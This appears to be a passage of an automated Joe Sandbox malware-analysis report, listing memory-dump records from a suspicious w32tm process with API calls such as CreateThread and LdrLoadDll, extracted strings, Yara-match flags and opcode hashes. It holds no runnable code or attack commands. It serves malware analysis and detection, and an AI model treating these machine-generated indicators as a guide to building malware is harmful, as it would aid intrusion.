                                                                                                                              • Opcode ID: d795545927a22455678fa0872e1fea9e5c9b1c9197e5258a3012aeee406cec4a
                                                                                                                              • Instruction ID: fa8c5c26b406b7ecff436303528ed28c040faf5adf5cd8f1093d77b61ac0c9a2
                                                                                                                              • Opcode Fuzzy Hash: d795545927a22455678fa0872e1fea9e5c9b1c9197e5258a3012aeee406cec4a
                                                                                                                              • Instruction Fuzzy Hash: 92F0BB72E0015C77DB114BD95C824FEFBBCEE85365B448196FE09D7110E6354E024751
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                              • String ID: @J7<
                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                              • Opcode ID: 7ec10a2ceda7ef2ecba5fd9b849a10bbf94fb0b487066a159eeb9565ae2f7f54
                                                                                                                              • Instruction ID: 8111bc3d219da6c2e9b1fa488f7636f8ace158431b345b123c22903d7e091a34
                                                                                                                              • Opcode Fuzzy Hash: 7ec10a2ceda7ef2ecba5fd9b849a10bbf94fb0b487066a159eeb9565ae2f7f54
                                                                                                                              • Instruction Fuzzy Hash: 363121B6A0020AAFDB00DFD8DC909EFB7B9FF88304B108559E515AB215D775EE45CBA0
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                              • String ID: @J7<
                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                              • Opcode ID: 44a969db3a060c4c4eb2624424c41ed9983831614997c1a36492c57d6ac486a9
                                                                                                                              • Instruction ID: 2b55d32817dc9254411d3a828ec5e04bbd13f75d0f596602176108ee42a6a450
                                                                                                                              • Opcode Fuzzy Hash: 44a969db3a060c4c4eb2624424c41ed9983831614997c1a36492c57d6ac486a9
                                                                                                                              • Instruction Fuzzy Hash: F03130B6A0020AAFDB00DFD8DC809EFB7B9FF88304B108559E515EB215D775EE058BA0
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 009743CB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: wininet.dll
                                                                                                                              • API String ID: 3472027048-3354682871
                                                                                                                              • Opcode ID: a4ef916f65128483a8b91885552e1d3fa93f2f44685b16ff31d349ba3339520a
                                                                                                                              • Instruction ID: d126d69101724b81a6f506b32adac9b689c76c6e8f9d98e21c4c080398488f1c
                                                                                                                              • Opcode Fuzzy Hash: a4ef916f65128483a8b91885552e1d3fa93f2f44685b16ff31d349ba3339520a
                                                                                                                              • Instruction Fuzzy Hash: C4316DB2600605BBD714DFA4CC81FEBB7B8BB84714F148518F61DAB281D774AA40CBA5
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00964DC2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 9a59494733ac891ecc550804846ff8bc25cff2bcc0ab931c2fb2fc0fd0ed1df2
                                                                                                                              • Instruction ID: 003de19976e1459b849ba71a29fe9bfcb34d4bb96f052641d970e84297de877a
                                                                                                                              • Opcode Fuzzy Hash: 9a59494733ac891ecc550804846ff8bc25cff2bcc0ab931c2fb2fc0fd0ed1df2
                                                                                                                              • Instruction Fuzzy Hash: CB011EB6D4020DABDF10EAE4DC42FDDB7B89B54308F1085A5E90CA7281F671EB14CB91
                                                                                                                              APIs
                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,00968B2E,00000010,?,?,?,00000044,?,00000010,00968B2E,?,?,?), ref: 0097A190
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186235152-0
                                                                                                                              • Opcode ID: b6556a9acbf142d0bba9ea88355e1da8df143ad859d6fa641add68fc301f4758
                                                                                                                              • Instruction ID: c2eca4035ce17a30eea539fae1e2768120f984ab759339b443ba21254a460ece
                                                                                                                              • Opcode Fuzzy Hash: b6556a9acbf142d0bba9ea88355e1da8df143ad859d6fa641add68fc301f4758
                                                                                                                              • Instruction Fuzzy Hash: A80180B2204508BBCB44DE99DC81EEB77ADAFCC754F519208BA1DE3245D630FC518BA4
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 0095A005
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: d7ad2adfab20bda21b4772c4530b23824e090bd52c098c61b548b09aa5b43d53
                                                                                                                              • Instruction ID: 9f0598b35d87e429f092518d02c4bc80f0187fbfea6a16035c2ea9432309e329
                                                                                                                              • Opcode Fuzzy Hash: d7ad2adfab20bda21b4772c4530b23824e090bd52c098c61b548b09aa5b43d53
                                                                                                                              • Instruction Fuzzy Hash: 4DF06D7339060436E230A6AA9C03FDBB29CCFC5B76F150426FA0CEB1C1D892B84146E9
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 0095A005
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: 43a8b5573b856bdbc8b935335697fa1caf365fe7d98307277d09ae20eb574b62
                                                                                                                              • Instruction ID: ef8b76f204b036f0651d0ad61313a6713ece7bde14d671c410b21879f1dec3a8
                                                                                                                              • Opcode Fuzzy Hash: 43a8b5573b856bdbc8b935335697fa1caf365fe7d98307277d09ae20eb574b62
                                                                                                                              • Instruction Fuzzy Hash: 7FF0927339161037D230A6B98D03FEB66ACCFC5766F15401AFB0CEB1C1D8A1B44547AA
                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 00978CB3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$NameName_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3514427675-0
                                                                                                                              • Opcode ID: 4e5ab915c21b480bfcae5200bb37caf09d8b87ea2617d27b0230fa62fd0076bf
                                                                                                                              • Instruction ID: ea04025dc685a82cf98907855d779707ba779ff75dcf0ffd02cc18cec9013aad
                                                                                                                              • Opcode Fuzzy Hash: 4e5ab915c21b480bfcae5200bb37caf09d8b87ea2617d27b0230fa62fd0076bf
                                                                                                                              • Instruction Fuzzy Hash: F6F039B6200205BBC710EF59DC41FAB77ADEFC8754F008418FA08A7241C670BD118BB8
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,81EC8B55,00000007,00000000,00000004,00000000,009645C4,000000F4), ref: 0097A0DF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              • Opcode ID: b0370a9810f3f8ae3eb76438a2bc4b3b9f7bad70dade675c6b0081f2d3febe89
                                                                                                                              • Instruction ID: 782647cf682910fc178dcc84f193c262a459a175615879e7c7b0eed2eb969054
                                                                                                                              • Opcode Fuzzy Hash: b0370a9810f3f8ae3eb76438a2bc4b3b9f7bad70dade675c6b0081f2d3febe89
                                                                                                                              • Instruction Fuzzy Hash: E2E06DB26003047BD614EE59DC41FAB37ADEFC5754F008008FA08A7241C670BD1087B9
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(009621E9,?,00976431,009621E9,00975EDF,00976431,?,009621E9,00975EDF,00001000,?,?,?), ref: 0097A08F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: 819e4ba01922608b8a6837657b59129ea6c623089a9d8f2795ada48a4572b4eb
                                                                                                                              • Instruction ID: d5c6ee24f8e236530694a8d20403937140dba8336d69ab3478b35b38c96c9bac
                                                                                                                              • Opcode Fuzzy Hash: 819e4ba01922608b8a6837657b59129ea6c623089a9d8f2795ada48a4572b4eb
                                                                                                                              • Instruction Fuzzy Hash: D3E065B22002087FD610EF59DC41FAB3BADEFC9754F008419FA08A7241C670BD148BB9
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(00000002), ref: 00968B9C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: 12493e60887a0636dbe6429b6a83e934d9d1a4e316a12b5e21ab4cbdd1206789
                                                                                                                              • Instruction ID: c398bcd237840e6a5ef6b76a01fe0c95b6ddfd5c2664528d4ed5b42013461c8a
                                                                                                                              • Opcode Fuzzy Hash: 12493e60887a0636dbe6429b6a83e934d9d1a4e316a12b5e21ab4cbdd1206789
                                                                                                                              • Instruction Fuzzy Hash: 5DE08CB255020426EB206AB89D8ABAB3628DF85728F184B55B86C9A1D3E928D9424610
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,009624F0,0097881F,00975EDF,009624B6), ref: 00968993
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: ddfd0176f1065bf6eb746523c9dfd652a8c9a9a6a617ec8342830d20a8d2e9d2
                                                                                                                              • Instruction ID: 3ec175ee1dc94bcc6cf68c03dc9d884f9268288ae96c39835b36eda82fae3d34
                                                                                                                              • Opcode Fuzzy Hash: ddfd0176f1065bf6eb746523c9dfd652a8c9a9a6a617ec8342830d20a8d2e9d2
                                                                                                                              • Instruction Fuzzy Hash: A5D05E72A842056EF610EBE4DC47FB7228D9B9436AF084464B91CDA2D2E825E5104A21
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,009624F0,0097881F,00975EDF,009624B6), ref: 00968993
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: f6aa15bb4077a8e0c89501a823cfb76e23af13ec337fcde5af642141c16b359b
                                                                                                                              • Instruction ID: 16f6f2fcde5a201345e45427d5fe4bc0efa008d8fc115bbe05b8097068a11e4d
                                                                                                                              • Opcode Fuzzy Hash: f6aa15bb4077a8e0c89501a823cfb76e23af13ec337fcde5af642141c16b359b
                                                                                                                              • Instruction Fuzzy Hash: 94D05E726803043BF600EBE5CC47F77328C8B84769F084464BA0CDB2C2EC65E5104A65
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a06046cb247960a6ca36f406581da5441d4b0ad38e1818d76e4b2a49df2946f9
                                                                                                                              • Instruction ID: 99d0cfe1ec046f2b3d6d5f6bc33766deed985b0ed514e0a73dab9ace993b0a03
                                                                                                                              • Opcode Fuzzy Hash: a06046cb247960a6ca36f406581da5441d4b0ad38e1818d76e4b2a49df2946f9
                                                                                                                              • Instruction Fuzzy Hash: 12B02B318014D4C9DE00F3204A087073904A7C0300F19C061D3030641E0338C0D0E171
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                              • API String ID: 0-3558027158
                                                                                                                              • Opcode ID: a774fcbadcaf67f1004be594f1f26ba9564a83aea78016218ee0757c7ff9507f
                                                                                                                              • Instruction ID: 65974efe9142ba2299015f908ebdb5bbb18c92ea3a228818d6f5cf25e886fc13
                                                                                                                              • Opcode Fuzzy Hash: a774fcbadcaf67f1004be594f1f26ba9564a83aea78016218ee0757c7ff9507f
                                                                                                                              • Instruction Fuzzy Hash: 2E915FF04182988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 3b6b562a4c4d0fc25f88cab7c5752fed8fb80abd1f993b623b667866b12cd9d9
                                                                                                                              • Instruction ID: af761503e9beab4b949732888a47152f44ffbee324f503e3baebfe9af4a58726
                                                                                                                              • Opcode Fuzzy Hash: 3b6b562a4c4d0fc25f88cab7c5752fed8fb80abd1f993b623b667866b12cd9d9
                                                                                                                              • Instruction Fuzzy Hash: CA51E6B6A04626AFDB24EB988CD097FF7BCBB08201754856AF465D7685D334DE108BA0
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: fee4aade2d82224768ab47a9fa0f740eee821cddac8461b4f82e3fa124251491
                                                                                                                              • Instruction ID: 9e5ec79db8b48c7590f57d293a98c25abaf0d51cf1228a2c3c8f38f6790a5d88
                                                                                                                              • Opcode Fuzzy Hash: fee4aade2d82224768ab47a9fa0f740eee821cddac8461b4f82e3fa124251491
                                                                                                                              • Instruction Fuzzy Hash: BF5125B5E00649AFCB64CF5CCC8087FB7F9AB44201B44885BF9A5DB242D7F4EA008764
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: /AZ;$0>+I$2.76$4MKJ$CSZ;$IJ$INTI$JZR1$OINT$OTJZ$THTH$Z=.W
                                                                                                                              • API String ID: 0-3517495131
                                                                                                                              • Opcode ID: cf7a1e310bb36753b3f6379a81bfea86a23076433385ea146afeb0aec07cae73
                                                                                                                              • Instruction ID: 2d71468fbea8dcf12c2d1c243b32412d64e1a34215392bb39306f2d9d8d63c48
                                                                                                                              • Opcode Fuzzy Hash: cf7a1e310bb36753b3f6379a81bfea86a23076433385ea146afeb0aec07cae73
                                                                                                                              • Instruction Fuzzy Hash: EA3123B095474CDBCB15DF90E080ADDBBB1FF00315F818059E95A7F241C7B98666CB8A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: /AZ;$0>+I$2.76$4MKJ$CSZ;$IJ$INTI$JZR1$OINT$OTJZ$THTH$Z=.W
                                                                                                                              • API String ID: 0-3517495131
                                                                                                                              • Opcode ID: 232ea54cc221144fe77007abf30c0d304b326343cb61e4c2ec5062c19229de77
                                                                                                                              • Instruction ID: b5c568d7f29cd42ea14ea7704ea8fcc0d961d5744f4dd8b5c92e63eaaedadd71
                                                                                                                              • Opcode Fuzzy Hash: 232ea54cc221144fe77007abf30c0d304b326343cb61e4c2ec5062c19229de77
                                                                                                                              • Instruction Fuzzy Hash: F83101B095434CDBCB15DF90E090ADDBBB2FF04315F818059E91A7F241C7B98666CB8A
                                                                                                                              Strings
                                                                                                                              • Execute=1, xrefs: 03414713
                                                                                                                              • ExecuteOptions, xrefs: 034146A0
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03414787
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034146FC
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03414742
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03414725
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03414655
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 33be56c29dbe857ddbebb10d24f478ff9f9b1aab2bc8596e76837ae84615c563
                                                                                                                              • Instruction ID: 0f01dba2f230f323bfaeb4db88a7b5bfa85ab190f5fe7a8530ed9119736b7029
                                                                                                                              • Opcode Fuzzy Hash: 33be56c29dbe857ddbebb10d24f478ff9f9b1aab2bc8596e76837ae84615c563
                                                                                                                              • Instruction Fuzzy Hash: 9E512736A003197ADF10EFA5ECC5BBE77B8EF08700F4404AAE505AF2D1E7719A458B54
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: edefad7050cec72c87ee8d66ce909e343b105ff0cedbddc4931a3143267d8cfa
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction Fuzzy Hash: 6D81AE74E092699EDF2ACE68C8D17FEFBA6AF45350F1C415AE861A77D0C7349840CB60
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 030aeca62150559c96a8f5bcc1a9b6a8b897b77496b0680fde2f109583cf8a71
                                                                                                                              • Instruction ID: bcd677e5b6b87655abdc99b9aa3533ee31c5326153de3e0ec3cb5ea7e96e8cfd
                                                                                                                              • Opcode Fuzzy Hash: 030aeca62150559c96a8f5bcc1a9b6a8b897b77496b0680fde2f109583cf8a71
                                                                                                                              • Instruction Fuzzy Hash: 18217176E00219ABDB10DE69CC80AAFB7E8AF54640F480517FD05EB241E770D9018BA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: u^$ u^$ u^$ u^$ u^$ u^
                                                                                                                              • API String ID: 0-1252239476
                                                                                                                              • Opcode ID: 9a8a590c3758d3addd801dca9f67bd79450d12dd4a152536180d3e80cbc28122
                                                                                                                              • Instruction ID: 9207e7ff60b9a9dd863568a27e04478027826cf9e67f05be9002d4396b353e97
                                                                                                                              • Opcode Fuzzy Hash: 9a8a590c3758d3addd801dca9f67bd79450d12dd4a152536180d3e80cbc28122
                                                                                                                              • Instruction Fuzzy Hash: 46111E74C0138D9FCF84EFA4E946AEEBBB0FF14200F10555AD919E2240E73896508BD6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: u^$ u^$ u^$ u^$ u^$ u^
                                                                                                                              • API String ID: 0-1252239476
                                                                                                                              • Opcode ID: ea7b926c5507bc9188034aacfcfa42c48f5825feeec891fdcbb1fb9a207a6691
                                                                                                                              • Instruction ID: ada43d18645c761d50652d216259853e7a401b82eff8ffade9ec1b9edc011dde
                                                                                                                              • Opcode Fuzzy Hash: ea7b926c5507bc9188034aacfcfa42c48f5825feeec891fdcbb1fb9a207a6691
